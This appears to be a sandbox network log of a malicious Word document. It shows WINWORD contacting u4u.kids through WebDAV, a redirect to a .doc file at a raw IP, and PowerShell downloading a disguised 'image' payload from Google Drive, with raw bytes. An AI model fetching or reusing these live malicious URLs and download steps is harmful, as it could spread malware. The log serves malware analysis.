                                                                                                                                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 33 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
                                                                                                                                                                        Data Ascii: { "geoplugin_request":"173.254.250.90", "geoplugin_status":200, "geoplugin_delay":"3ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        0192.168.2.224916124.199.88.844433492C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-10-23 15:26:14 UTC130OUTOPTIONS / HTTP/1.1
                                                                                                                                                                        User-Agent: Microsoft Office Protocol Discovery
                                                                                                                                                                        Host: u4u.kids
                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2024-10-23 15:26:14 UTC439INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                        Date: Wed, 23 Oct 2024 15:26:14 GMT
                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                        Connection: close
                                                                                                                                                                        X-DNS-Prefetch-Control: off
                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                        Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        Allow: GET,HEAD
                                                                                                                                                                        ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                                                                                                                                                                        2024-10-23 15:26:14 UTC8INData Raw: 47 45 54 2c 48 45 41 44
                                                                                                                                                                        Data Ascii: GET,HEAD


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        1192.168.2.224916224.199.88.844433492C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-10-23 15:26:15 UTC246OUTHEAD /clm3hy?&sing=cuddly&brain=hapless&kingfish=perpetual&cake=scientific&bacon=kindhearted&jelly=pumped&reveal=reflective&clock=agonizing&yak HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                        Host: u4u.kids
                                                                                                                                                                        2024-10-23 15:26:15 UTC612INHTTP/1.1 302 Found
                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                        Date: Wed, 23 Oct 2024 15:26:15 GMT
                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                        Content-Length: 221
                                                                                                                                                                        Connection: close
                                                                                                                                                                        X-DNS-Prefetch-Control: off
                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                        Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        Location: http://85.215.206.82/270/weg/wg/deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthisnfds.doc
                                                                                                                                                                        Vary: Accept


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        2192.168.2.224916324.199.88.84443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-10-23 15:26:19 UTC125OUTOPTIONS / HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                                                                                                                                        translate: f
                                                                                                                                                                        Host: u4u.kids
                                                                                                                                                                        2024-10-23 15:26:20 UTC439INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                        Date: Wed, 23 Oct 2024 15:26:20 GMT
                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                        Connection: close
                                                                                                                                                                        X-DNS-Prefetch-Control: off
                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                        Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        Allow: GET,HEAD
                                                                                                                                                                        ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                                                                                                                                                                        2024-10-23 15:26:20 UTC8INData Raw: 47 45 54 2c 48 45 41 44
                                                                                                                                                                        Data Ascii: GET,HEAD


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        3192.168.2.224916424.199.88.84443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-10-23 15:26:21 UTC155OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 75 34 75 2e 6b 69 64 73 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: u4u.kids
                                                                                                                                                                        2024-10-23 15:26:21 UTC435INHTTP/1.1 404 Not Found
                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                        Date: Wed, 23 Oct 2024 15:26:21 GMT
                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                        Content-Length: 144
                                                                                                                                                                        Connection: close
                                                                                                                                                                        X-DNS-Prefetch-Control: off
                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                        Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        Content-Security-Policy: default-src 'none'
                                                                                                                                                                        2024-10-23 15:26:21 UTC144INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        4192.168.2.224916524.199.88.84443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-10-23 15:26:22 UTC155OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 75 34 75 2e 6b 69 64 73 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: u4u.kids
                                                                                                                                                                        2024-10-23 15:26:22 UTC435INHTTP/1.1 404 Not Found
                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                        Date: Wed, 23 Oct 2024 15:26:22 GMT
                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                        Content-Length: 144
                                                                                                                                                                        Connection: close
                                                                                                                                                                        X-DNS-Prefetch-Control: off
                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                        Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        Content-Security-Policy: default-src 'none'
                                                                                                                                                                        2024-10-23 15:26:22 UTC144INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        5192.168.2.224916624.199.88.844433492C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-10-23 15:26:23 UTC476OUTGET /clm3hy?&sing=cuddly&brain=hapless&kingfish=perpetual&cake=scientific&bacon=kindhearted&jelly=pumped&reveal=reflective&clock=agonizing&yak HTTP/1.1
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                                                                                                                                                        UA-CPU: AMD64
                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                        Host: u4u.kids
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2024-10-23 15:26:23 UTC600INHTTP/1.1 302 Found
                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                        Date: Wed, 23 Oct 2024 15:26:23 GMT
                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                        Content-Length: 221
                                                                                                                                                                        Connection: close
                                                                                                                                                                        X-DNS-Prefetch-Control: off
                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                        Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                        Location: http://85.215.206.82/270/weg/wg/deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthisnfds.doc
                                                                                                                                                                        Vary: Accept
                                                                                                                                                                        2024-10-23 15:26:23 UTC221INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 38 35 2e 32 31 35 2e 32 30 36 2e 38 32 2f 32 37 30 2f 77 65 67 2f 77 67 2f 64 65 65 74 68 65 62 65 73 74 74 68 69 6e 67 77 69 74 68 6d 65 67 72 65 61 74 61 74 74 69 72 75 64 65 77 69 74 68 67 72 65 61 74 74 68 69 67 6e 73 5f 5f 5f 5f 5f 5f 5f 5f 5f 65 6e 69 74 65 72 6c 69 66 65 77 69 74 68 67 72 65 61 74 6e 69 63 65 77 6f 72 6b 69 6e 67 73 6b 69 6c 6c 77 69 74 68 6d 65 62 67 72 65 61 74 74 68 69 67 6e 73 74 6f 62 65 5f 5f 5f 5f 5f 5f 5f 5f 76 65 72 79 6e 69 63 65 70 65 72 73 6f 6e 65 6e 74 69 74 65 72 6c 69 66 65 77 69 74 68 6e 65 77 74 68 69 73 6e 66 64 73 2e 64 6f 63
                                                                                                                                                                        Data Ascii: Found. Redirecting to http://85.215.206.82/270/weg/wg/deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthisnfds.doc


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        6192.168.2.224916824.199.88.844433492C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-10-23 15:26:26 UTC265OUTHEAD /clm3hy?&sing=cuddly&brain=hapless&kingfish=perpetual&cake=scientific&bacon=kindhearted&jelly=pumped&reveal=reflective&clock=agonizing&yak HTTP/1.1
                                                                                                                                                                        User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                        Host: u4u.kids
                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2024-10-23 15:26:26 UTC612INHTTP/1.1 302 Found
                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                        Date: Wed, 23 Oct 2024 15:26:26 GMT
                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                        Content-Length: 221
                                                                                                                                                                        Connection: close
                                                                                                                                                                        X-DNS-Prefetch-Control: off
                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                        Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        Location: http://85.215.206.82/270/weg/wg/deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthisnfds.doc
                                                                                                                                                                        Vary: Accept


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        7192.168.2.2249171142.250.181.2384432924C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-10-23 15:26:53 UTC121OUTGET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
                                                                                                                                                                        Host: drive.google.com
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2024-10-23 15:26:53 UTC1319INHTTP/1.1 303 See Other
                                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                        Date: Wed, 23 Oct 2024 15:26:53 GMT
                                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-8M7StpCf8ybRVaq4xkDX2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                        Server: ESF
                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                        Connection: close


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        8192.168.2.2249172216.58.212.1294432924C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-10-23 15:26:54 UTC139OUTGET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1
                                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2024-10-23 15:26:56 UTC4884INHTTP/1.1 200 OK
                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                        Content-Security-Policy: sandbox
                                                                                                                                                                        Content-Security-Policy: default-src 'none'
                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                        X-Content-Security-Policy: sandbox
                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        Content-Disposition: attachment; filename="new_image-new.jpg"
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        Access-Control-Allow-Credentials: false
                                                                                                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        Content-Length: 2239109
                                                                                                                                                                        Last-Modified: Mon, 21 Oct 2024 13:42:20 GMT
                                                                                                                                                                        X-GUploader-UploadID: AHmUCY2OWyLVono0YjYRAisQt6d5YHZGp5voL6qrZPhWTCALmnJPPiAQ3ytXo1Y2WEePyL4a2PdM1QNkDA
                                                                                                                                                                        Date: Wed, 23 Oct 2024 15:26:56 GMT
                                                                                                                                                                        Expires: Wed, 23 Oct 2024 15:26:56 GMT
                                                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                                                        X-Goog-Hash: crc32c=WqxmdA==
                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                        Connection: close
                                                                                                                                                                        2024-10-23 15:26:56 UTC4884INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                                                                        Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                                                                        2024-10-23 15:26:57 UTC4884INData Raw: 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f b9 cd 04 62 f1 19 03 ed 55 b5 34 6c 13 99 53 48 aa 43 28 23 68 01 89 e7 9c 98 27 46 81 d1 49 00 1d c6 fb 9c 07 6f 7c 8a 24 76 64 ec a4 5e 15 62 d3 c0 8c e5 e5 24 03 e9 02 c5 62 1a 6d 62 bb 00 cc 14 ad 81 78 71 36 e4 61 be af 8c 0c ad 42 99 26 76 51 44 9a 0a 16 b8 c5 99 19 0d 32 90 7e 23
                                                                                                                                                                        Data Ascii: +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}E./bU4lSHC(#h'FIo|$vd^b$bmbxq6aB&vQD2~#
                                                                                                                                                                        2024-10-23 15:26:57 UTC47INData Raw: de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39
                                                                                                                                                                        Data Ascii: oVuvH[J}I#k&>$"d)v9
                                                                                                                                                                        2024-10-23 15:26:57 UTC1322INData Raw: ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 e5 81 e9 07 8b 40 da 67 d5 0f 0e d3 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38 a3 b3 cb 29 6b 35 f0 2c 72 ad e3 50 00 36 f8 74 25 bd ed f9 ff 00 c5 99 f3 17 91 43 33 12 d4 7f 11 ba e7 b6 2e 18 b2 d8 8c 00 bf e2 16 0e 06 be b7 c5 22 62 a9 1e 8e 28 db 68 66 23 78 60 7d b9 6c e9 f5 9a 68 94 d2 18 d9 95 48 45 53 46 d5 6e c9 3c 75
                                                                                                                                                                        Data Ascii: 6cBG,$]/3kG>M&w2C3R)!^*@g)w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(hf#x`}lhHESFn<u
                                                                                                                                                                        2024-10-23 15:26:57 UTC1378INData Raw: 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a ea 53 53 2c 72 6d 0a b1 86 20 1e 7a fe 59 89 11 d7 6a 17 64 26 79 1a e8 90 cc 76 df c7 a0 ca b3 a3 43 24 b3 6a 7f 7b c0 45 ae 4d 77 bf 6c 67 c3 5e 72 fb 20 75 60 80 ca 55 ba 13 44 1f e7 81 53 a2 f1 b4 86 49 8c b3 20 4e 4a 89 da c8 fa 1c 57 45 ac f1 1d 44 a4 c5 aa 76 65 e4 2b 4a 7a 7d 78 cf 68 ed fb a6 b5 05 45 92 08 be 9c e7 90 d7 c4 9a
